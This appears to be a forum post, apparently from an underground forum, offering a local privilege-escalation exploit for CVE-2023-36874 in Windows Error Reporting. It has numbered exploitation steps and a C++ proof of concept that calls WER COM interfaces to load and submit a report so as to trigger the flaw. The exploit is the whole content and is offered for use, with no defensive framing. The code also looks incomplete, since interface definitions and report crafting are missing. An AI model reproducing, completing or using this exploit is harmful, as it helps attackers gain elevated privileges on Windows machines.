
Local CVE-2023-36874

0x00x0 (HDD-drive; banned; registered 25.04.2022; 48 messages; 57 reactions; guarantor deals: 2; deposit: 0.009 Ł and others)
Please note that this user is banned.
C-like:
# The exploit follows these steps to trigger the vulnerability:

    Initialize COM by calling CoInitialize(NULL).
    Create COM interfaces to interact with WER:
        Create an instance of CLSID_ERCLuaSupport to obtain an IErcLuaSupport interface.
        Use IErcLuaSupport to create an IWerStoreFactory instance.
        Create an IWerStore instance using IWerStoreFactory.
    Start the report enumeration process by calling pIWerStore->EnumerateStart().
    Load a report using the pIWerStore->LoadReport function. Replace "ReportName" with the actual report name you want to exploit.
    Submit the loaded report to trigger the vulnerability by calling pIWerReport->SubmitReport().
    Release the COM interfaces and clean up the resources:
        pIWerReport->Release()
        pIWerStore->Release()
        pIWerStoreFactory->Release()
        pIErcLuaSupport->Release()
    Uninitialize COM by calling CoUninitialize().

PoC
C++:
#include <Windows.h>
#include <iostream>

int main() {
    // Initialize COM by calling CoInitialize(NULL).
    CoInitialize(NULL);

    // Create COM interfaces for interacting with WER:
    IWerReport* pIWerReport = nullptr;
    IErcLuaSupport* pIErcLuaSupport = nullptr;
    IWerStoreFactory* pIWerStoreFactory = nullptr;
    IWerStore* pIWerStore = nullptr;

    // Create an instance of CLSID_ERCLuaSupport to get an IErcLuaSupport interface.
    CoCreateInstance(CLSID_ERCLuaSupport, NULL, CLSCTX_LOCAL_SERVER, IID_IErcLuaSupport, (PVOID*)&pIErcLuaSupport);

    // Use IErcLuaSupport to create an IWerStoreFactory instance.
    pIErcLuaSupport->CoCreateIWerStoreFactory(&pIWerStoreFactory);

    // Create an IWerStore instance using IWerStoreFactory.
    pIWerStoreFactory->CoCreateIWerStore(&pIWerStore);

    // Exploit steps
    // Enumerate and start the report retrieval process by calling pIWerStore->EnumerateStart().
    pIWerStore->EnumerateStart();

    // Load a report using the pIWerStore->LoadReport function. Replace "ReportName" with the actual report name you want to exploit.
    pIWerStore->LoadReport(L"ReportName", &pIWerReport);

    // Submit the loaded report to trigger the vulnerability by calling pIWerReport->SubmitReport().
    pIWerReport->SubmitReport();

    // Clean up
    // Release the COM interfaces and clean up the resources.
    pIWerReport->Release();
    pIWerStore->Release();
    pIWerStoreFactory->Release();
    pIErcLuaSupport->Release();

    // Uninitialize COM by calling CoUninitialize().
    CoUninitialize();

    return 0;
}